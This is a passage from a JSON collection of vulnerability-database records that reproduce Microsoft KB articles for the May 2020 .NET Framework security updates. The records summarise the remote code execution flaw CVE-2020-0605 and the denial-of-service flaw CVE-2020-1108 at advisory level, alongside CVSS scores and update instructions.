this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552926>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552926.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552926 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4552926", "href": "https://support.microsoft.com/en-us/help/4552926", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:40:59", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552929>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552929.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552929 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4552929", "href": "https://support.microsoft.com/en-us/help/4552929", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:34", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552979](<https://support.microsoft.com/help/4552979>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4552979) \n * [4552947](<https://support.microsoft.com/help/4552947>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4552947) \n * [4552922](<https://support.microsoft.com/help/4552922>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4552922) \n * [4552932](<https://support.microsoft.com/help/4552932>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4552932) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4556400)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556400", "href": "https://support.microsoft.com/en-us/help/4556400", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:05", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 3.5, 4.7.2 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552924](<https://support.microsoft.com/help/4552924>) Description of the Cumulative Update for .NET Framework 3.5 and 4.7.2 for Windows 10 Version 1809 and Windows Server 2019 (KB4552924) \n * [4552930](<https://support.microsoft.com/help/4552930>) Description of the Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1809 and Windows Server 2019 (KB4552930) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4556441 Cumulative Update for .NET Framework 3.5, 4.7.2 and 4.8 for Windows 10 Version 1809 and Windows Server 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556441", "href": "https://support.microsoft.com/en-us/help/4556441", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:05", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations >)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552966](<https://support.microsoft.com/help/4552966>) Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4552966) \n * [4552967](<https://support.microsoft.com/help/4552967>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4552967) \n * [4552959](<https://support.microsoft.com/help/4552959>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4552959) \n * [4552962](<https://support.microsoft.com/help/4552962>) Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4552962) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4556405)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556405", "href": "https://support.microsoft.com/en-us/help/4556405", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:40:58", "description": "None\nRelease Date: \n**May 12, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552928>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552928.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "May 12, 2020-KB4552928 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4552928", "href": "https://support.microsoft.com/en-us/help/4552928", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:45:09", "description": "<html><body><p>May 12, 2020-KB4552927 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>May 12, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\" id=\"kb-link-2\" target=\"_self\">CVE-2020-0605</a></li></ul><p> A denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1108\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1108</a></li></ul><p> <strong> <span class=\"text-base\">Quality and reliability improvements</span> </strong> </p><table class=\"table\"> <tbody> <tr> <td width=\"100\">Winforms</td> <td> <p> - Addresses an issue with WinForms ComboBox control reinitialization in AD FS MMC UI. </p> <p> - Adresses an issue getting accessible objects for PropertyGridView ComboBox property items - adding the verification for item existence and validity. </p> <p> - Addresses an issue with interaction between WPF user control and hosting WinForms app when processing keyboard input. </p> </td> </tr> <tr> <td width=\"100\">Workflow</td> <td> <p> - Addresses an accessibility issue where text inside a Windows Workflow Foundation Visual Basic Editor would use the wrong colors in high contrast themes. </p> </td> </tr> <tr> <td width=\"100\"> CLR<sup>1</sup></td> <td> <p> - Addresses rare crashes that could occur if Server GC is enabled and a GC occurs while another thread is running NGen'ed code which is making the initial call into NGen'ed code in a 2nd module where one or more parameter types involve valuetypes defined in a 3rd module. </p> <p> - Addresses crashes that could occur in certain scenarios involving hot-added CPUs and/or multi-group machines where per-group CPU count is not consistent across all groups </p> <p> - Addresses rare crashes or deadlocks that could occur if a GC occurs while another thread is running NGen'ed code which is making the initial call into a static method within the same module where one or more parameter types involve type-forwarded valuetypes. </p> <p> - Addresses rare crashes that could occur during the first call that native code makes into the managed portion of a mixed-mode DLL. </p> </td> </tr> </tbody> </table><p class=\"indent-1\"> <br/> <sup>1</sup> Common Language Runtime (CLR)<br/></p><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><p> This update will be downloaded and installed automatically from Windows Update.<br/></p><p> To get the standalone package for this update, go to the <span lang=\"EN\"><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4552927\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a></span></span></span> website. </p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/d/a/9/da9019da-7092-43c4-ac1a-95ab1a2928a0/4552927.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T00:00:00", "type": "mskb", "title": "May 12, 2020-KB4552927 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1703", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T17:00:23", "id": "KB4552927", "href": "https://support.microsoft.com/en-us/help/4552927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:35:35", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing 